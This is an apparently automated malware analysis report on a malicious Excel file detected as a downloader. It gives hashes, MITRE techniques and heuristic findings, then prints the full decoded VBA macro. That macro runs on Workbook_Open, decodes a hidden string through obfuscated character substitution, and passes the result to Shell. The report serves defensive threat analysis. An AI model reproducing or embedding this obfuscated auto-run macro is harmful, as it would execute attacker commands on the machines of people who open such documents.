Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 590259401da43fb5…

MALICIOUS

Office (OLE)

52.0 KB Created: 2018-10-16 16:44:32 Authoring application: Microsoft Excel First seen: 2019-04-18
MD5: 353d74e3b6dca388ef461afa0b50edb6 SHA-1: d4113049a7bca22ecb36333c03e7c0d7e9fde34e SHA-256: 590259401da43fb5152df9e6a63505de68e4c47d6583f6280bff96e1e311c4d0
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing a Workbook_Open VBA macro, which is a common technique for executing malicious code automatically when the document is opened. The ClamAV heuristic identifies it as a downloader, suggesting it is designed to fetch and execute additional payloads. The VBA macro is the primary mechanism for this execution.

Heuristics 3

  • ClamAV: Doc.Downloader.00536d-6755246-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6755246-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3670 bytes
SHA-256: 92b879f1bef319e8e253b4f48f024ac352580560ad99eef3f3b5f634924f60fb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
s1 = "2410"
start_main_dialog1 s1
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "dialog1"
Attribute VB_Base = "0{D4C5605C-74E4-430D-9758-CD27AF03860E}{AC8D0F7F-F6FB-4E42-960A-740F2A154DCB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()

End Sub

Private Sub CommandButton2_Click()

End Sub

Private Sub ComboBox1_Change()

End Sub

Private Sub EditText1_Change()
Dim ind1 As String
ind1 = "1006"
End Sub

Private Sub TextBox1_Change()
replaceCharsInLeter
End Sub

Private Sub LastText_Change()
lev2 = "03"
lev1 = Len(dialog1.LastText)
fh = "04"
replaceCharsInLeter2 lev1
End Sub

Private Sub date1_Change()

End Sub

Private Sub TextBox2_Change()

End Sub

Attribute VB_Name = "Module1"
Sub chars_replace(Cell1, ByRef op)
st1 = 1
op = ""
replaceChars st1, op, Cell1
End Sub

Sub replaceChars(ByRef pointA, ByRef need, later)
f_str = Len(later)
If pointA <= f_str Then
ch = ""
fine later, pointA, ch
idial = 1
dial_total_price ch, idial
st = ""
dial_pivot idial - 2, st
need = need + st
pointA = pointA + 1
replaceChars pointA, need, later
End If
End Sub

Sub replaceCharsInLeter()
Dim level As String
chars_replace dialog1.date1, level
dialog1.EditText1 = level
dialog1.LastText = dialog1.EditText1
End Sub


Sub start_main_dialog1(string1)
dialog1.TextBox1 = string1
End Sub

Sub dial_scrub_multi(ByRef b1, ByRef control, ActiveCellInTable)
log2 = 1
log2 = Len(dialog1.Text1)
If b1 < log2 Then
b = ""
fine dialog1.Text1, b1, b
If ActiveCellInTable <> b Then
b1 = b1 + 1
dial_scrub_multi b1, control, ActiveCellInTable
Else
control = b1
End If
End If
End Sub

Sub fine(ARG1, pointB, ByRef state_min)
s1 = Left(ARG1, pointB)
s1 = "" + s1
state_min = Right(s1, 1)
End Sub


Sub replaceCharsInLeter2(i)
With dialog1
If 429 - i = 0 Then Shell .LastText, i - 4 * 105 - 9
End With
End Sub

Sub dial_total_price(addper4, ByRef ARG2)
ARG2 = 0
sub2 = 1
dial_scrub_multi sub2, ARG2, addper4
End Sub
  
Sub dial_pivot(pointer, ByRef state_max)
state_max = ""
If pointer = -1 Then
pointer = -1
End If
If pointer < 1 Then
fine dialog1.Text1, Len(dialog1.Text1) + pointer, state_max
Else
fine dialog1.Text1, pointer, state_max
End If
End Sub